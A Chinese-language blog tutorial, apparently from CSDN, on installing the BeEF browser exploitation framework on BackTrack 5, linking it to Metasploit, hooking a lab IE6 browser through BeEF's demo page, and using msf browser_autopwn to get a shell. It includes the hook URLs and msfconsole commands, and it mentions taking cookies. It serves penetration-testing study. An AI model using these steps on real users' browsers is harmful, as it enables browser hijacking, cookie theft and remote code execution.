初探BeEF
1.什么是BeEF?
就是The Browser Exploitation Framework 的縮寫,意在通過一些手段,控制對方的瀏覽器。
里面集成了很多模塊,能夠獲取很多東西,有cookie,瀏覽器名字,版本,插件,是否支持java,vb,flash等,所以說XSS神器嘛。。
大概長這個樣子(默認用戶名密碼是beef,beef):
2.安裝beef和使用beef
BT5r3 已經是自帶了ruby和beef了,我們不用下載和安裝了。
[plain]view plaincopy
ruby:ruby1.9.2dev(2010-07-02)[i486-linux]
beef:Version0.4.3.6-alpha
beef默認安裝在:/pentest/web/beef/ 下
metasploit默認安裝在:/opt/metasploit/下
翻看了下beef的安裝文檔:INSTALL.txt
[plain]view plaincopy
1.Prerequisites(platformindependent)
BeEFrequiresruby1.9andthe"bundler"gem.Bundlercanbeinstalledby:
geminstallbundler
.Prerequisites(Linux)
!!!ThismustbedonePRIORtorunningthebundleinstallcommand!!!
Onlinuxyouwillneedtofindthepackagesspecifictoyourdistributionforsqlite.AnexampleforUbuntusystemsis:
3.0.sudoapt-getinstalllibsqlite3-devsqlite3sqlite3-doc
3.1.installrvmfromrvm.beginrescueend.com,thistakescareofthevariousincompatableandconflictingrubypackagesthatarerequired
3.2.rvminstall1.9.2
3.3.rvmuse1.9.2
發(fā)現有個東西必須的安裝:bundler!(千古一問:為什么BT5不一起把bundler安裝好呢?)
總結了下就是:
[plain]view plaincopy
apt-getinstalllibsqlite3-devsqlite3sqlite3-doc
geminstallbundler
bundleinstall
如果出錯(因為環(huán)境變量的問題,我感覺看官們一定會出錯的,乖乖輸入下面的命令):
[plain]view plaincopy
geminstall--user-installbundler
然后開啟beef:./beef
出現如下信息則成功:
[plain]view plaincopy
root@bt:/pentest/web/beef#./beef
[9:17:50][*]BrowserExploitationFramework(BeEF)
[9:17:50]|Version0.4.3.6-alpha
[9:17:50]|Websitehttp://beefproject.com
[9:17:50]|Run'beef-h'forbasichelp.
[9:17:50]|_Run'gitpull'toupdatetothelatestrevision.
[9:17:50][*]SuccessfulconnectionwithMetasploit.
[9:17:53][*]Loaded203Metasploitexploits.
[9:17:53][*]BeEFisloading.Waitafewseconds...
[9:17:57][*]9extensionsloaded:
[9:17:57]|Console
[9:17:57]|Requester
[9:17:57]|Events
[9:17:57]|Proxy
[9:17:57]|XSSRays
[9:17:57]|Autoloader
[9:17:57]|Metasploit
[9:17:57]|Demos
[9:17:57]|_AdminUI
[9:17:57][*]316modulesenabled.
[9:17:57][*]2networkinterfacesweredetected.
[9:17:57][+]runningonnetworkinterface:127.0.0.1
[9:17:57]|HookURL:http://127.0.0.1:3000/hook.js
[9:17:57]|_UIURL:http://127.0.0.1:3000/ui/panel
[9:17:57][+]runningonnetworkinterface:192.168.198.128
[9:17:57]|HookURL:http://192.168.198.128:3000/hook.js
[9:17:57]|_UIURL:http://192.168.198.128:3000/ui/panel
[9:17:57][*]RESTfulAPIkey:c29aef201f68aee70afc6ffedea1f77e8304ce72
[9:17:57][*]HTTPProxy:http://127.0.0.1:6789
[9:17:57][*]BeEFserverstarted(presscontrol+ctostop)
其實BeEF能干很多事,比如說,控制被HOOK瀏覽器彈個框吧:
3.配置beef攜手Metasploit
首先關閉beef(Ctrl+C)。
在/opt/metasploit/文件夾下gedit beef.rc,寫入內容:
[plain]view plaincopy
loadmsgrpcServerHost=127.0.0.1Pass=abc123
這里上網搜了下,發(fā)現密碼神馬的最好不要改,那就不改啦~
安裝msgpack:
[plain]view plaincopy
geminstall--user-installmsgpack
修改配置讓beef支持metasploit:
[plain]view plaincopy
gedit/pentest/web/beef/config.yaml
把metasploit:
enable:false
改成:
metasploit:
enable:true
Ps:這里必須先開msf,再開beef,才能在beef下用msf,也就是說兩者開著一起工作!
我們啟動metasploit:
[plain]view plaincopy
root@bt:/opt/metasploit/msf3#msfconsole-rbeef.rc
出現如下信息就表示成功:
[plain]view plaincopy
[*]Processingbeef.rcforERBdirectives.
resource(beef.rc)>loadmsgrpcServerHost=127.0.0.1Pass=abc123
[*]MSGRPCService:127.0.0.1:55552
[*]MSGRPCUsername:msf
[*]MSGRPCPassword:abc123
[*]Successfullyloadedplugin:msgrpc
然后我們再啟動beef:
[plain]view plaincopy
root@bt:/pentest/web/beef#./beef
beef,beef登陸后我們就能看到一個可愛的界面了:
然后BeEF自帶了一個hack頁面,坐等別人上鉤:
[plain]view plaincopy
http://127.0.0.1:3000/demos/basic.html
里面主要是有這么一段js代碼:
[plain]view plaincopy
4.對XPSP1測試
(1)讓xp sp1 用IE6訪問hack頁面:
[plain]view plaincopy
http://192.168.198.128:3000/demos/basic.html
發(fā)現面板左側上多了一個目標,也就是我們喜歡的IE6:
(2)
拿msf生成HOOK鏈接:
[plain]view plaincopy
msf>useauxiliary/server/browser_autopwn
msfauxiliary(browser_autopwn)>setLHOST192.168.198.128#我服務器自己的地址
LHOST=>192.168.198.128
msfauxiliary(browser_autopwn)>run
然后出來一大堆URL,我們選擇,IE的一個:
[plain]view plaincopy
http://192.168.198.128:8080/hxRmMPkYJa
控制被HOOK的瀏覽器去訪問這個鏈接:
然后msf 突然就開始自己(意味著自動化,這點以前一直以為我要做些什么,其實不用)跑起來,拿到shell:
至此,BeEF就算是一個初步認識和使用了。
有很多功能還沒學會了,不過我感覺控制那個cookie之類的應該是沒問題了。。
這么強大的神器,你還在等什么呢?
emaster 關注信息安全的胖子
歡迎轉載,但轉載請注明地址:http://blog.csdn.net/emaste_r/article/details/17091067
總結
- 上一篇: offsetwidth/offsethe
- 下一篇: 滑动门效果